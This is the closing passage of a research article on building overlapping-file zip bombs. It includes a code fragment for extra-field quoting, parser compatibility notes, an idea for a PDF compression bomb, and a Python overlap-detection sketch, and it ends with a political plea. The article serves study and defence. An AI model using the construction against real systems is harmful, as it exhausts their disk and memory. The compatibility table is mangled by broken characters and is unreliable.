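    # size. Declaring size quoted_len while supplying no data of our own
    # makes the next quoted_len bytes of the zip file (the following local
    # file headers) count as this record's data.
    return struct.pack('<HH', tag, quoted_len)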
The figure illustrates the possibility of using extra-field quoting with bzip2, with and without Zip64. Both lines have a knee at which the growth transitions from quadratic to linear. In the non-Zip64 case, the knee occurs where the maximum uncompressed file size (2^32 − 2 bytes) is reached; after this point, one can only increase the number of files, not their size. The line ends completely when the number of files reaches 1809, when we run out of room in the extra field to quote additional headers. In the Zip64 case, the knee occurs at 1171 files, after which the size of files can be increased but not their number. Extra-field quoting also helps in the case of DEFLATE, but the difference is so slight as to be visually imperceptible, so it has been omitted from the figure. It increases the compression ratio of zbsm.zip by 1.2%; zblg.zip by 0.019%; and zbxl.zip by 0.0025%.
Discussion
In related work, Plötz et al. used overlapping files to create a near-self-replicating zip file. Gynvael Coldwind has previously suggested (slide 47) overlapping files.
We have designed the quoted-overlap zip bomb construction for compatibility, taking into consideration a number of implementation differences, some of which are shown in the table below. The resulting construction is compatible with zip parsers that work in the usual back-to-front way, first consulting the central directory and using it as an index of files. Among these is the example zip parser included in Nail, which is automatically generated from a formal grammar. The construction is not compatible, however, with "streaming" parsers, those that parse the zip file from beginning to end in one pass without first reading the central directory. By their nature, streaming parsers do not permit any kind of file overlapping. The most likely outcome is that they will extract only the first file. They may even raise an error besides, as is the case with sunzip, which parses the central directory at the end and checks it for consistency with the local file headers it has already seen.
If you need the extracted files to start with a certain prefix other than the bytes of a local file header, you can insert a DEFLATE block before the non-compressed block that quotes the next header. Not every file in the zip file has to participate in the bomb construction: you can also include ordinary files if needed to conform to some special format. (The source code has a --template option to facilitate this use case.) Many file formats use zip as a container; examples are Java JAR, Android APK, and LibreOffice documents.
PDF is in many ways similar to zip. It has a cross-reference table at the end of the file that points to objects earlier in the file, and it supports DEFLATE compression of objects through the FlateDecode filter. I haven't tried it, but it may be possible to use the quoted-overlap idea to make a PDF compression bomb. It may not even be necessary to work that hard: binaryhax0r suggests in a blog post that one can simply specify multiple layers of FlateDecode on a single object, which makes a compression bomb easy.
Detecting the specific class of zip bomb we have developed in this article is easy: just look for overlapping files. Mark Adler has written a patch for Info-ZIP UnZip that does just that. In general, though, rejecting overlapping files does not protect against all classes of zip bomb. It is difficult to predict in advance whether a zip file is a bomb or not, unless you have precise knowledge of the internals of the parsers that will be used to parse it. Peeking into the headers and summing the "uncompressed size" fields of all files does not work, in general, because the value stored in the headers may not agree with the actual uncompressed size. (See the "permits too-short file size" row in the compatibility table.) Robust protection against zip bombs involves placing time, memory, and disk space limits on the zip parser while it operates. Handle zip parsing, as any complex operation on untrusted data, with caution.
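A sketch of that overlap check using Python's zipfile module (approximate: it ignores local extra fields and data descriptors, and measures the filename length in characters rather than encoded bytes):

import zipfile

def has_overlapping_files(path):
    with zipfile.ZipFile(path) as z:
        infos = sorted(z.infolist(), key=lambda i: i.header_offset)
    end = 0
    for info in infos:
        if info.header_offset < end:   # starts inside the previous file
            return True
        end = info.header_offset + 30 + len(info.filename) + info.compress_size
    return False

Run against a zip produced by the quoted-overlap construction, it should return True; against an ordinary zip file, False.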
 | Info-ZIP UnZip 6.0 | Python 3.7 zipfile | Go 1.12 archive/zip | yauzl 2.10.0 (Node.js) | Nail examples/zip | Android 9.0.0 r1 libziparchive | sunzip 0.4 (streaming)
---|---|---|---|---|---|---|---
DEFLATE | โ | โ | โ | โ | โ | โ | โ |
Zip64 | โ | โ | โ | โ | โ | โ | โ |
bzip2 | โ | โ | โ | โ | โ | โ | โ |
permits mismatched filenames | warns | โ | โ | โ | โ | โ | โ |
permits incorrect CRC-32 | warns | โ | if zero | โ | โ | โ | โ |
permits too-short file size | โ | โ | โ | โ | โ | โ | โ |
permits file size of 2^32 − 1 | โ | โ | โ | โ | โ | โ | โ
permits file count of 2^16 − 1 | โ | โ | โ | โ | โ | โ | โ
unzips overlap.zip | warns | โ | โ | โ | โ | โ | โ |
unzips zbsm.zip and zblg.zip | โ | โ | โ | โ | โ | โ | โ |
unzips zbxl.zip | โ | โ | โ | โ | โ | โ | โ |
Credits
I thank Mark Adler, Russ Cox, Brandon Enright, Marek Majkowski, and Josh Wolfe for comments on a draft of this article. Caolรกn McNamara evaluated the security impact of the zip bombs in LibreOffice.
Did you find a system that chokes on one of these zip bombs? Did they help you demonstrate a vulnerability or win a bug bounty? Let me know and I'll try to mention it here.
- LibreOffice 6.1.5.2
- zblg.zip renamed to zblg.odt or zblg.docx will cause LibreOffice to create and delete a number of ~4 GB temporary files as it attempts to determine the file format. It does eventually finish, and it deletes the temporary files as it goes, so it doesn't fill up the disk. Caolรกn McNamara replied to my bug report.
- Mozilla addons-server 2019.06.06
- I tried the zip bombs against a local installation of addons-server, which is part of the software behind addons.mozilla.org. The system handles it gracefully, imposing a time limit of 110 s on extraction. The zip bomb expands as fast as the disk will let it up to the time limit, but after that point the process is killed and the unzipped files are eventually automatically cleaned up.
- UnZip 6.0
- Mark Adler wrote a patch for UnZip to detect this class of zip bomb.
A version of this article will appear in the USENIX WOOT 2019 workshop. The source code of the paper is available. The artifacts prepared for submission are zipbomb-woot19.zip.
A final plea
It's time to put an end to Facebook. Working there is not ethically neutral: every day that you go into work, you are doing something wrong. If you have a Facebook account, delete it. If you work at Facebook, quit.
And let us not forget that the National Security Agency must be destroyed.